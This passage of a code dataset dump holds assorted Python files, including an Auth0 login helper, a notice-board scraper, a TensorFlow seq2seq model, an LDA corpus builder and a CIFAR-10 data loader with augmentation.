userinfo = resp.json()\n session['jwt_payload'] = userinfo\n session['profile'] = {'user_id':userinfo['sub'], \n 'name':userinfo['name'], \n 'picture':userinfo['picture']}\n return redirect(url_redirect)\n\n @classmethod\n def auth0_callback_url2login(cls, auth0, callback_url):\n return auth0.authorize_redirect(redirect_uri=callback_url)\n\n @classmethod\n def requires_auth(cls, func=None, login_url=None):\n if login_url is None:\n login_url = '/'\n\n def wrapper(f):\n\n @wraps(f)\n def wrapped(*_, **__):\n if 'profile' not in session:\n return redirect(login_url)\n return f(*_, **__)\n\n return wrapped\n\n if func:\n return wrapper(func)\n return wrapper","sub_path":"pycfiles/foxylib-0.3.96-py3.7/auth0_tool.cpython-37.py","file_name":"auth0_tool.cpython-37.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"58235133","text":"import re\n\nfrom requests import *\n\n\nclass Detector:\n\n def __init__(self):\n pass\n\n def isNewNotification(self, location): #인자로 받은 지방 병무청 url에 새 공지사항이 있는지 검사합니다.\n page = post(location).text\n result = self.regex(page)\n if result != None: # 만약 새 글이 있다면\n return result # 새 글의 정보가 담긴 json 파일을 반환합니다.\n else:\n return 'no new notification'\n\n\n def regex(self, string): # 정규표현식으로, 새로운 공지사항이 있는지 체크\n pat = self.getPattern()\n result = re.search(pat, string, flags=re.DOTALL)\n json = self.parse(result)\n if json == False:\n return False\n return json\n\n def parse(self, data):\n if data == None:\n return False\n id_num = data.group(1)\n print('글 번호:', end=' ')\n print(id_num)\n title = data.group(3)\n print('글 제목:', end=' ')\n print(title)\n\n return {'id_num':id_num, 'title':title}\n\n def getPattern(self):\n #([0-9]{1,3}) 은 글 번호를 의미함. 1번 group\n #(.*)는 사이의 모든 문자열을 의미\n #([0-9]{1,3})(.*)>(.*) \"python -m myfile\"\n\"\"\"\nWhen use python -m xxx, xxx.py is loaded as a module (with a __package__ of prefix with ., non-NONE, and similar to be loaded with import), \nthen run as the top-level script.\nthe xxx.py directory will NOT be added as first [0] of sys.path.\n\n有两种方式加载一个 py 文件:作为 top-level 脚本或者作为 module。前者指的是直接运行脚本,比如 python myfile.py。\n如果执行 python -m myfile,或者在其它 py 文件中用 import 语句来加载,那么它就会被当作一个 module。有且只能有一个 top-level 脚本,\n就是最开始执行的那个(比如 python myfile.py 中的 myfile.py,译者注)。\n\n当一个 py 文件被加载之后,它会被赋予一个名字,保存在 __name__ 属性中。如果是 top-level 脚本,那么名字就是 __main__。如果是作为 module,\n名字就是把它所在的 packages/subpackages 和文件名用 . 连接起来。\n\n====> import 是否成功,取决于:\n1)where to type 'python abcxyz'\n2) how to run 'abcxyz' , (-m, -c, etc)\n\"\"\"\n\n# Fibonacci numbers module\n\ndef fib(n): # write Fibonacci series up to n\n print(\"name: \", __name__)\n # when in python interactive mode, imoport test_name as fibo, fibo.fib(1), name is 'test_name'\n # just type fibo.__name__\n # when in terminal, python [-m] test_name.py 3, it is '__main__'\n a, b = 0, 1\n while b < n:\n #print(b, end=\" \")\n print(b, \" \")\n a, b = b, a+b\n print()\n\ndef fib2(n): # return Fibonacci series up to n\n print(\"this is fib2 in test_name.\")\n print(\"name: \", __name__)\n print(\"__package__: \", __package__)\n result = []\n a, b = 0, 1\n while b < n:\n result.append(b)\n a, b = b, a+b\n return result\n\n\"\"\"\n\nLingLins-MacBook-Pro:test linglin$ python3\nPython 3.6.2 (default, Jul 17 2017, 16:44:45) \n[GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import test_name\n>>> fibo.fibo()\nTraceback (most recent call last):\n File \"\", line 1, in \nNameError: name 'fibo' is not defined\n>>> fibo.fib(3)\nTraceback (most recent call last):\n File \"\", line 1, in \nNameError: name 'fibo' is not defined\n>>> fib(3)\nTraceback (most recent call last):\n File \"\", line 1, in \nNameError: name 'fib' is not defined\n>>> test_name.fib(3)\n1 1 2 \n>>> import test_name as fibo\n>>> fibo.fib(3)\n1 1 2 \n>>> fibo.__name__\n'test_name'\n>>> fibo.fib(2)\nname: test_name\n1 1 \n>>> fibo.__package__\n''\n>>> \n\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n import sys\n fib2(int(sys.argv[1]))\n print(sys.path[0], sys.path)\n print(\"argv[0]: \", sys.argv[0])\n\n\"\"\"\n6.1.1. Executing modules as scripts\nWhen you run a Python module with\n\npython fibo.py \nthe code in the module will be executed, just as if you imported it, but with the __name__ set to \"__main__\". \nThat means that by adding this code at the end of your module:\n\n\nif __name__ == \"__main__\":\n import sys\n fib(int(sys.argv[1]))\n \nyou can make the file usable as a script as well as an importable module, because the code that parses the command line \nonly runs if the module is executed as the “main” file:\n\n\"\"\"\n\n\n\n\"\"\"\nLingLins-MacBook-Pro:testhello linglin$ python3 -m test.test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: test\n ['', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n================\n\nLingLins-MacBook-Pro:testhello linglin$ python3 test/test_name.py 3\nthis is fib2 in test_name.\nname: __main__\n__package__: None\n/Users/linglin/PycharmProjects/testhello/test ['/Users/linglin/PycharmProjects/testhello/test', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: test/test_name.py\n\n=======================\n\nLingLins-MacBook-Pro:testhello linglin$ cd test\nLingLins-MacBook-Pro:test linglin$ python3 test_name.py 3\nthis is fib2 in test_name.\nname: __main__\n__package__: None\n/Users/linglin/PycharmProjects/testhello/test ['/Users/linglin/PycharmProjects/testhello/test', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: test_name.py\nLingLins-MacBook-Pro:test linglin$ \n\n=======================\n\nLingLins-MacBook-Pro:test linglin$ python3 -m test_name.py 3\n/usr/local/opt/python3/bin/python3.6: Error while finding module specification for 'test_name.py' (AttributeError: module 'test_name' has no attribute '__path__')\n\nLingLins-MacBook-Pro:test linglin$ python3 -m .test_name.py 3\n/usr/local/opt/python3/bin/python3.6: Relative module names not supported\n\nLingLins-MacBook-Pro:test linglin$ python3 -m test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: \n ['', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n=======================\n\nLingLins-MacBook-Pro:testhello linglin$ cd ..\nLingLins-MacBook-Pro:PycharmProjects linglin$ python3 testhello//test/test_name.py 3\nthis is fib2 in test_name.\nname: __main__\n__package__: None\n/Users/linglin/PycharmProjects/testhello/test ['/Users/linglin/PycharmProjects/testhello/test', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: testhello//test/test_name.py\nLingLins-MacBook-Pro:PycharmProjects linglin$ \n\n\nLingLins-MacBook-Pro:PycharmProjects linglin$ python3 -m testhello.test.test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: testhello.test\n ['', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n\nLingLins-MacBook-Pro:PycharmProjects linglin$ cd ..\nLingLins-MacBook-Pro:~ linglin$ python3 -m PycharmProjects.testhello.test.test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: PycharmProjects.testhello.test\n ['', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n\n\"\"\"","sub_path":"test/test_name.py","file_name":"test_name.py","file_ext":"py","file_size_in_byte":8277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"267644216","text":"##!/usr/bin/python3\n\"\"\"\n Author: hejingwen\n Purpose: Function Example\n Created: 4/16/2020\n\"\"\"\nimport random\nimport string\n\ndef dataSampling(datatype, datarange, num, strlen=6): # 固定参数;可变参数arg*;默认参数;关键字参数**kwargs\n '''\n :Description: function...\n :param datatype: input the type of data\n :param datarange: input the range of data, a iterable data object\n :param num: the number of data\n :return: a set of sampling data\n '''\n try:\n result = set()\n for index in range(1, num):# while(result.account == num)\n if datatype is int:\n it = iter(datarange)\n item = random.randint(next(it), next(it))\n result.add(item)\n continue\n elif datatype is float:\n result.add(random.uniform(1, 10))\n continue\n elif datatype is str:\n item = ''.join(random.SystemRandom().choice(datarange) for _ in range(strlen))\n result.add(item)\n continue\n else:\n pass\n except:\n if type(datatype) is int and type(datarange) is tuple:\n print()\n elif type(datatype) is str and type(datarange) is str:\n print()\n else:\n print(\"数据类型或者数据范围出错\")\n\n\n finally:\n return result\n\ndef dataScreening(dataset, condition):\n try:\n for i in dataset:\n if type(i) is int:\n if i>condition[0] and i 0 :\r\n a = CardAuthor()\r\n a.card = newq\r\n a.author = request.user\r\n a.save()\r\n\r\n return question_id\r\n \r\ndef cards_by_user(user, count=10) :\r\n '''Return a queryset of Card object made by a user'''\r\n authored_cards = Card.objects.filter(cardauthor__author=user).order_by('-id')\r\n return authored_cards\r\n\r\n \r\n\r\n","sub_path":"deck/deck_util.py","file_name":"deck_util.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"442258407","text":"import tensorflow as tf\nimport pdb\nimport numpy as np\nclass Seq2Seq:\n\n logits = None\n outputs = None\n cost = None\n train_op = None\n\n def __init__(self, vocab_size, n_hidden=128, n_layers=3,output_keep_prob=0.75):\n self.learning_late = 0.001\n\n self.vocab_size = vocab_size\n self.n_hidden = n_hidden\n self.n_layers = n_layers\n\n self.enc_input = tf.placeholder(tf.float32, [None, None, self.vocab_size])\n self.enc_input_reverse = tf.placeholder(tf.float32, [None, None, self.vocab_size])\n self.dec_input = tf.placeholder(tf.float32, [None, None, self.vocab_size])\n self.targets = tf.placeholder(tf.int64, [None, None])\n\n self.weights = tf.Variable(tf.ones([self.n_hidden, self.vocab_size]), name=\"weights\")\n self.bias = tf.Variable(tf.zeros([self.vocab_size]), name=\"bias\")\n self.global_step = tf.Variable(0, trainable=False, name=\"global_step\")\n\n self._build_model(output_keep_prob)\n\n self.saver = tf.train.Saver(tf.global_variables())\n\n def _build_model(self,output_keep_prob ):\n # self.enc_input = tf.transpose(self.enc_input, [1, 0, 2])\n # self.dec_input = tf.transpose(self.dec_input, [1, 0, 2])\n\n enc_cell, dec_cell = self._build_cells(output_keep_prob)\n enc_cell = Wrapper(enc_cell)\n\n with tf.variable_scope('encode_forward'):\n enc_forward_outputs, enc_states_forward_final = tf.nn.dynamic_rnn(enc_cell, self.enc_input, dtype=tf.float32)\n\n with tf.variable_scope('encode_backward'):\n enc_backward_outputs, enc_states_backward_final = tf.nn.dynamic_rnn(enc_cell, self.enc_input_reverse, dtype=tf.float32)\n\n enc_states = []\n enc_states_forward = enc_forward_outputs[0]\n enc_states_backward = enc_backward_outputs[0]\n\n\n for i, item in enumerate(enc_states_forward):\n enc_states.append(tf.contrib.rnn.LSTMStateTuple(tf.concat((item[0], enc_states_backward[i][0]), axis=2),\n tf.concat((item[1], enc_states_backward[i][1]), axis=2)))\n\n \n ################################################################################################################\n \n # Decoder에 처음으로 들어갈 context vector의 값을 설정해 보세요\n \n with tf.variable_scope('decode'):\n outputs, dec_states = tf.nn.dynamic_rnn(dec_cell, self.dec_input, dtype=tf.float32,\n initial_state=enc_states_forward_final)\n\n ################################################################################################################\n\n self.logits, self.cost, self.train_op = self._build_ops(outputs, self.targets)\n\n self.outputs = tf.argmax(self.logits, 2)\n \n def _cell(self, output_keep_prob, n_hidden):\n rnn_cell = tf.nn.rnn_cell.LSTMCell(n_hidden)\n rnn_cell = tf.nn.rnn_cell.DropoutWrapper(rnn_cell, output_keep_prob=output_keep_prob)\n return rnn_cell\n\n def _build_cells(self, output_keep_prob=0.75):\n enc_cell = tf.nn.rnn_cell.MultiRNNCell([self._cell(output_keep_prob, self.n_hidden)\n for _ in range(self.n_layers)]) # self.n_layers 만큼 deep한 RNN 네트워크 구성 (for encoder) // _cell은 LSTM wrapper임\n dec_cell = tf.nn.rnn_cell.MultiRNNCell([self._cell(output_keep_prob, self.n_hidden)\n for _ in range(self.n_layers)]) # self.n_layers 만큼 deep한 RNN 네트워크 구성 (for decoder)\n\n return enc_cell, dec_cell\n\n def _build_ops(self, outputs, targets):\n time_steps = tf.shape(outputs)[1]\n outputs = tf.reshape(outputs, [-1, self.n_hidden])\n\n logits = tf.matmul(outputs, self.weights) + self.bias\n logits = tf.reshape(logits, [-1, time_steps, self.vocab_size])\n\n cost = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=targets))\n train_op = tf.train.AdamOptimizer(learning_rate=self.learning_late).minimize(cost, global_step=self.global_step)\n\n tf.summary.scalar('cost', cost)\n\n return logits, cost, train_op\n\n def train(self, session, enc_forward_input,enc_reverse_input, dec_input, targets):\n\n enc_input_reverse=[np.flip(i,axis=0) for i in enc_reverse_input]\n return session.run([self.train_op, self.cost],\n feed_dict={self.enc_input: enc_forward_input,\n self.dec_input: dec_input,\n self.enc_input_reverse: enc_input_reverse,\n self.targets: targets})\n\n def test(self, session, enc_forward_input, enc_input_reverse, dec_input, targets):\n enc_input_reverse=[np.flip(i,axis=0) for i in enc_input_reverse]\n\n\n prediction_check = tf.equal(self.outputs, self.targets)\n accuracy = tf.reduce_mean(tf.cast(prediction_check, tf.float32))\n\n return session.run([self.targets, self.outputs, accuracy],\n feed_dict={self.enc_input: enc_forward_input,\n self.enc_input_reverse: enc_input_reverse,\n self.dec_input: dec_input,\n self.targets: targets})\n\n def predict(self, session, enc_forward_input, enc_reverse_input, dec_input):\n\n enc_input_reverse=[np.flip(i,axis=0) for i in enc_reverse_input]\n return session.run(self.outputs,\n feed_dict={self.enc_input: enc_forward_input,\n self.enc_input_reverse: enc_input_reverse,\n self.dec_input: dec_input})\n\n def write_logs(self, session, writer, enc_input, dec_input, targets):\n merged = tf.summary.merge_all()\n\n summary = session.run(merged, feed_dict={self.enc_input: enc_input,\n self.dec_input: dec_input,\n self.targets: targets})\n\n writer.add_summary(summary, self.global_step.eval())\n\n\nclass Wrapper(tf.nn.rnn_cell.RNNCell):\n def __init__(self, inner_cell):\n super(Wrapper, self).__init__()\n self._inner_cell = inner_cell\n\n @property\n def state_size(self):\n return self._inner_cell.state_size\n\n @property\n def output_size(self):\n return (self._inner_cell.state_size, self._inner_cell.output_size)\n\n def call(self, input, *args, **kwargs):\n output, next_state = self._inner_cell(input, *args, **kwargs)\n emit_output = (next_state, output)\n return emit_output, next_state\n","sub_path":"Chatbot_RNN/model_sen.py","file_name":"model_sen.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"294182315","text":"import argparse\nimport os\nimport logging\nimport datetime\nimport itertools\nfrom gensim import corpora, models\n\n\n# Input arguments\nPROGRAM_DESCRIPTION = \"Read TV show tweets and analyse\"\nparser = argparse.ArgumentParser(description=PROGRAM_DESCRIPTION)\nparser.add_argument('prefix', type=str, help='Prefix of input files')\nparser.add_argument('directory', type=str, help='Directory tv show')\nparser.add_argument('output', type=str, help='Directory tv show')\nargs = vars(parser.parse_args())\n\ndef main():\n collection_name = args['prefix']\n dir_name = args['directory']\n output_dir = args['output']\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n filename = dir_name + \"/\" + collection_name +\"_text.csv\"\n output_file= output_dir + \"/\" + collection_name +\"_text.csv\"\n\n\n log_file = output_dir + '/' + collection_name + \"lda_log.log\"\n logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s %(message)s')\n logging.debug(\"reading users fof topic modelling: {0} for hashtags : {1}\".format(datetime.date.today(), collection_name))\n\n doc_gen = read_file_into_generator(filename)\n create_corpus(doc_gen, filename, output_file)\n\n\ndef create_corpus(doc_gen, filename, output_file):\n documents1, documents2 = itertools.tee(doc_gen) # clone the generator\n # create a Gensim dictionary from documents\n dictionary = corpora.Dictionary(documents1)\n logging.debug(\"dictionary length {0}\".format(len(dictionary)))\n # filter extremes\n dictionary.filter_extremes(no_below=1, no_above=0.5)\n logging.debug(\"dictionary length after extreme removal {0}\".format(len(dictionary)))\n dictionary.save(output_file + '.dict')\n\n # convert the dictionary to a corpus\n corpus = [dictionary.doc2bow(doc) for doc in documents2]\n corpora.MmCorpus.serialize(output_file + '_corpus.mm', corpus)\n logging.debug(\"corpus written !!\")\n\ndef read_file_into_generator(filename):\n print(\"reading {}\".format(filename))\n with open(filename, 'r') as r:\n count = 0\n for line in r:\n count += 1\n if count % 1000 == 0:\n logging.debug(\"users done {0}\".format(count))\n yield line.split()\n\n\nif __name__ ==\"__main__\":\n main()","sub_path":"gLDA/lda_gensim_make_corpus.py","file_name":"lda_gensim_make_corpus.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"143479746","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Ming JIN\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import random_seed\nfrom PIL import Image\nimport fileUtil as file\nfrom labelFile2Map import *\nimport base\nimport cv2\nimport random\n\ndef read_data_sets(data_dir,\n one_hot=True,\n dtype=dtypes.float32,\n reshape=True,\n validation_size=0, #no validation needed\n seed=None):\n\n TRAIN = os.path.join(data_dir, \"train\", \"train.txt\")\n TEST = os.path.join(data_dir, \"test\", \"test.txt\")\n\n train_images, train_labels = process_images(TRAIN, one_hot=one_hot)\n test_images, test_labels = process_images(TEST, one_hot=one_hot)\n\n validation_images = train_images[:validation_size]\n validation_labels = train_labels[:validation_size]\n train_images = train_images[validation_size:]\n train_labels = train_labels[validation_size:]\n \n cut = numpy.empty((128,24,24,3))\n cut_test = numpy.empty((1280,24,24,3))\n \n new_part_cut = numpy.empty((128,24,24,3))\n new_part_cut_test = numpy.empty((1280,24,24,3))\n rest_part_cut = numpy.empty((128,24,24,3))\n rest_part_cut_test = numpy.empty((1280,24,24,3))\n \n train = DataSet(train_images, train_labels, cut, cut_test, new_part_cut, rest_part_cut, new_part_cut_test, rest_part_cut_test, dtype=dtype, reshape=reshape, seed=seed)\n validation = DataSet(validation_images,validation_labels,cut,cut_test, new_part_cut, rest_part_cut, new_part_cut_test, rest_part_cut_test, dtype=dtype,reshape=reshape,seed=seed)\n test = DataSet(test_images, test_labels, cut, cut_test, new_part_cut, rest_part_cut, new_part_cut_test, rest_part_cut_test, dtype=dtype, reshape=reshape, seed=seed)\n\n return base.Datasets(train=train, validation=validation, test=test)\n\n\ndef process_images(label_file, one_hot, num_classes=10):\n if file.getFileName(label_file) == 'train.txt':\n images = numpy.empty((50000, 3072)) \n labels = numpy.empty(50000)\n if file.getFileName(label_file) == 'test.txt':\n images = numpy.empty((10000, 3072))\n labels = numpy.empty(10000)\n lines = readLines(label_file)\n label_record = map(lines)\n file_name_length = len(file.getFileName(label_file))\n image_dir = label_file[:-1*file_name_length]\n print(len(label_record))\n index = 0\n for name in label_record:\n image = Image.open(image_dir + str(label_record[name]) + '/' + name)\n if index % 100 == 0:\n print(\"processing %d: \" % index + image_dir + str(label_record[name]) + '/' + name)\n\n img_ndarray = numpy.asarray(image, dtype='float32')\n images[index] = numpy.ndarray.flatten(img_ndarray)\n labels[index] = numpy.int(label_record[name])\n\n index = index + 1\n print(\"done: %d\" % index)\n num_images = index\n rows = 32\n cols = 32\n \n if one_hot:\n return images.reshape(num_images, rows, cols, 3), dense_to_one_hot(numpy.array(labels, dtype=numpy.uint8), num_classes)\n \n return images.reshape(num_images, rows, cols, 3), numpy.array(labels, dtype=numpy.uint8)\n\n\ndef dense_to_one_hot(labels_dense, num_classes):\n \"\"\"Convert class labels from scalars to one-hot vectors.\"\"\"\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n\n\nclass DataSet(object):\n def __init__(self,\n images,\n labels,\n cut_images,\n cut_test_images,\n images_new_part_cut,\n images_rest_part_cut,\n images_new_part_cut_test,\n images_rest_part_cut_test,\n fake_data=False,\n one_hot=False,\n dtype=dtypes.float32,\n reshape=False,\n seed=None):\n \"\"\"Construct a DataSet.\n one_hot arg is used only if fake_data is true. `dtype` can be either\n `uint8` to leave the input as `[0, 255]`, or `float32` to rescale into\n `[0, 1]`. Seed arg provides for convenient deterministic testing.\n \"\"\"\n seed1, seed2 = random_seed.get_seed(seed)\n # If op level seed is not set, use whatever graph level seed is returned\n numpy.random.seed(seed1 if seed is None else seed2)\n dtype = dtypes.as_dtype(dtype).base_dtype\n \n if dtype not in (dtypes.uint8, dtypes.float32):\n raise TypeError('Invalid image dtype %r, expected uint8 or float32' %\n dtype)\n if fake_data:\n \n self._num_examples = 10000\n self.one_hot = one_hot\n \n else:\n \n assert images.shape[0] == labels.shape[0], ('images.shape: %s labels.shape: %s' % (images.shape, labels.shape))\n self._num_examples = images.shape[0]\n\n if reshape:\n assert images.shape[3] == 3\n images = images.reshape(images.shape[0], images.shape[1], images.shape[2], images.shape[3])\n \n if dtype == dtypes.float32:\n images = images.astype(numpy.float32)\n images = numpy.multiply(images, 1.0 / 255.0)\n \n self._images = images\n self._labels = labels\n self._epochs_completed = 0\n self._index_in_epoch = 0\n \n self._cut_images = cut_images\n self._cut_test_images = cut_test_images\n self._images_new_part_cut = images_new_part_cut\n self._images_rest_part_cut = images_rest_part_cut\n self._images_new_part_cut_test = images_new_part_cut_test\n self._images_rest_part_cut_test = images_rest_part_cut_test \n \n @property\n def images(self):\n return self._images\n\n @property\n def labels(self):\n return self._labels\n\n @property\n def num_examples(self):\n return self._num_examples\n\n @property\n def epochs_completed(self):\n return self._epochs_completed\n\n def next_batch(self, batch_size, shuffle, flip, whiten, noise, crop, crop_test):\n \"\"\"Return the next `batch_size` examples from this data set.\"\"\"\n \n start = self._index_in_epoch\n \n # Shuffle for the first epoch\n if self._epochs_completed == 0 and start == 0 and shuffle:\n perm0 = numpy.arange(self._num_examples)\n numpy.random.shuffle(perm0)\n self._images = self.images[perm0]\n self._labels = self.labels[perm0]\n \n # Go to the next epoch\n if start + batch_size > self._num_examples: #本次epoch从 _index_in_epoch 到 _index_in_epoch + batch_size\n #如果这个条件满足了就说明了已经完成了对图片库一遍的遍历,需要重新洗牌再组合batch\n # Finished epoch\n self._epochs_completed += 1\n # Get the rest examples in this epoch\n rest_num_examples = self._num_examples - start\n images_rest_part = self._images[start:self._num_examples]\n labels_rest_part = self._labels[start:self._num_examples]\n \n # Shuffle the data\n if shuffle:\n perm = numpy.arange(self._num_examples)\n numpy.random.shuffle(perm)\n self._images = self.images[perm]\n self._labels = self.labels[perm]\n \n # Start next epoch \n start = 0\n self._index_in_epoch = batch_size - rest_num_examples\n end = self._index_in_epoch\n \n images_new_part = self._images[start:end]\n labels_new_part = self._labels[start:end]\n \n if crop:\n images_crop_1 = images_new_part\n self._images_new_part_cut = self._image_crop(images_crop_1)\n \n images_crop_2 = images_rest_part\n self._images_rest_part_cut = self._image_crop(images_crop_2)\n \n if crop_test:\n images_crop_1 = images_new_part\n self._images_new_part_cut_test = self._image_test_crop(images_crop_1)\n \n images_crop_2 = images_rest_part\n self._images_rest_part_cut_test = self._image_test_crop(images_crop_2) \n \n if flip:\n images_flip_1 = self._images_new_part_cut\n self._images_new_part_cut = self._image_flip(images_flip_1)\n images_flip_2 = self._images_rest_part_cut\n self._images_rest_part_cut = self._image_flip(images_flip_2)\n \n if whiten:\n if crop:\n images_whiten_1 = self._images_new_part_cut\n self._images_new_part_cut = self._image_whitening(images_whiten_1)\n images_whiten_2 = self._images_rest_part_cut\n self._images_rest_part_cut = self._image_whitening(images_whiten_2)\n \n if crop_test:\n images_whiten_1 = self._images_new_part_cut_test\n self._images_new_part_cut_test = self._image_whitening(images_whiten_1)\n images_whiten_2 = self._images_rest_part_cut_test\n self._images_rest_part_cut_test = self._image_whitening(images_whiten_2) \n \n if noise:\n images_noise_1 = self._images_new_part_cut\n self._images_new_part_cut = self._image_noise(images_noise_1)\n images_noise_2 = self._images_rest_part_cut\n self._images_rest_part_cut = self._image_noise(images_noise_2)\n \n if crop:\n return numpy.concatenate((self._images_rest_part_cut, self._images_new_part_cut), axis=0) , numpy.concatenate((labels_rest_part, labels_new_part), axis=0)\n elif crop_test: \n return numpy.concatenate((self._images_rest_part_cut_test, self._images_new_part_cut_test), axis=0) , numpy.concatenate((labels_rest_part, labels_new_part), axis=0)\n \n else:\n self._index_in_epoch += batch_size\n end = self._index_in_epoch\n \n if crop:\n images_crop = self._images[start:end]\n self._cut_images = self._image_crop(images_crop)\n\n if crop_test:\n images_crop = self._images[start:end]\n self._cut_test_images = self._image_test_crop(images_crop)\n \n if flip:\n images_flip = self._cut_images\n self._cut_images = self._image_flip(images_flip)\n \n if whiten:\n if crop:\n images_whiten = self._cut_images\n self._cut_images = self._image_whitening(images_whiten)\n if crop_test:\n images_whiten = self._cut_test_images\n self._cut_test_images = self._image_whitening(images_whiten) \n \n if noise:\n images_noise = self._cut_images\n self._cut_images = self._image_noise(images_noise)\n \n if crop:\n return self._cut_images, self._labels[start:end]\n elif crop_test:\n return self._cut_test_images, self._labels[start:end] \n\n########################数据增强相关函数#############################\n def _image_crop(self, images, crop_shape=(24,24,3)):\n # 图像切割\n new_images = numpy.empty((images.shape[0],24,24,3))\n for i in range(images.shape[0]):\n old_image = images[i,:,:,:]\n left = numpy.random.randint(old_image.shape[0] - crop_shape[0] + 1)\n top = numpy.random.randint(old_image.shape[1] - crop_shape[1] + 1)\n new_image = old_image[left:left+crop_shape[0],top:top+crop_shape[1], :]\n new_images[i,:,:,:] = new_image\n \n return new_images\n\n def _image_test_crop(self, images, crop_shape=(24,24,3)):\n # 图像切割\n new_images = numpy.empty((images.shape[0],24,24,3))\n for i in range(images.shape[0]):\n old_image = images[i,:,:,:]\n left = int((old_image.shape[0] - crop_shape[0])/2)\n top = int((old_image.shape[1] - crop_shape[1])/2)\n new_image = old_image[left:left+crop_shape[0],top:top+crop_shape[1], :]\n new_images[i,:,:,:] = new_image\n \n return new_images\n\n def _image_whitening(self, images):\n # 图像白化\n for i in range(images.shape[0]):\n old_image = images[i,:,:,:]\n new_image = (old_image - numpy.mean(old_image)) / numpy.std(old_image)\n images[i,:,:,:] = new_image\n \n return images\n \n def _image_flip(self, images):\n # 图像翻转\n for i in range(images.shape[0]):\n \n old_image = images[i,:,:,:]\n \n if numpy.random.random() < 0.5:\n new_image = cv2.flip(old_image, 1)\n else:\n new_image = old_image\n \n images[i,:,:,:] = new_image\n \n return images\n\n def _image_noise(self, images, mean=0, std=0.01):\n # 图像噪声\n for i in range(images.shape[0]):\n old_image = images[i,:,:,:]\n new_image = old_image\n for i in range(old_image.shape[0]):\n for j in range(old_image.shape[1]):\n for k in range(old_image.shape[2]):\n new_image[i, j, k] += random.gauss(mean, std)\n images[i,:,:,:] = new_image\n \n return images","sub_path":"icifar10.py","file_name":"icifar10.py","file_ext":"py","file_size_in_byte":13083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"602058798","text":"import numpy as np\nimport netCDF4\n\ndef geo_idx(dd, dd_array):\n #\n # returns the index of the closest degrees decimal value in the array.\n # dd = degrees decimal 